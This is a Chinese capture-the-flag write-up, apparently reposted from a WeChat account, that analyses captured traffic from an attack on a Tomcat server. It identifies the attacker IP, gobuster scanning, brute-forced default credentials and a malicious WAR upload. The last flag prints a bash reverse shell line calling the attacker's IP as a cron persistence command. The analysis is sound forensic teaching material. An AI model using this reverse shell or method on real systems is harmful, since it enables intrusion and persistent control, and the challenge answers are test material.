flag1 : 在web服务器上发现的可疑活动,流量分析会显示很多请求,这表明存在恶意的扫描⾏为,通过分flag格式:flag{ip},如:flag{127.0.0.1}flag2 : 找到攻击者IP后请通过技术⼿段确定其所在地址 flag格式: flag{城市英⽂⼩写}flag3 : 哪⼀个端⼝提供对web服务器管理⾯板的访问?flag格式:flag{2222}flag4 : 经过前⾯对攻击者⾏为的分析后,攻击者运⽤的⼯具是?flag格式:flag{名称}flag5 : 攻击者拿到特定⽬录的线索后,想要通过暴⼒破解的⽅式登录,请通过分析流量找到攻击者登录成flag格式:flag{root-123}flag6 : 攻击者登录成功后,先要建⽴反弹shell,请分析流量提交恶意⽂件的名称?flag格式:flag{114514.txt}flag7 : 攻击者想要维持提权成功后的登录,请分析流量后提交关键的信息?flag提示,某种任务⾥的信息
flag1:在web服务器上发现的可疑活动,流量分析会显示很多请求,这表明存在恶意的扫描⾏为,通过分析扫描的⾏为后提交攻击者IP flag格式:flag{ip},如:flag{127.0.0.1}直接过滤HTTP协议,然后寻找连续的404的返回包:
flag{14.0.0.120}flag2:找到攻击者IP后请通过技术⼿段确定其所在地址 flag格式: flag{城市英⽂⼩写}在线⽹站通过IP地址反查物理地址:https://site.ip138.com/
flag{guangzhou}flag3:哪⼀个端⼝提供对web服务器管理⾯板的访问?flag格式:flag{2222}⼤致查看数据包,其中最像后台管理⾯板⽬录的是 host-manager 和 manager ⽬录。这两个⽬录的访问端⼝都是8080:
flag{8080}flag4:经过前⾯对攻击者⾏为的分析后,攻击者运⽤的⼯具是?flag格式:flag{名称}⼀般扫描⼯具的指纹特征都在User-Agent头中:
flag{gobuster}flag5:攻击者拿到特定⽬录的线索后,想要通过暴⼒破解的⽅式登录,请通过分析流量找到攻击者登录成功的⽤户名和密码?flag格式:flag{root-123}我们直接找到爆破的最后⼀个数据包,得到账号密码:
flag{admin-tomcat}flag6:攻击者登录成功后,先要建⽴反弹shell,请分析流量提交恶意⽂件的名称?flag格式:flag{114514.txt}找到上传的⽂件的数据包,追踪流:
flag{JXQOZY.war}flag7:攻击者想要维持提权成功后的登录,请分析流量后提交关键的信息?flag提示,某种任务⾥的信息提示太明显了,计划任务!我们从上传war包的数据包之后的流中,挨个查看tcp流,找到计划任务命令:
flag{/bin/bash -c 'bash -i >& /dev/tcp/14.0.0.120/443 0>&1'}作者:船山院士团队成员 sw0rd
原文始发于微信公众号(船山信安):玄机流量特征分析-常⻅攻击事件 tomcat
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论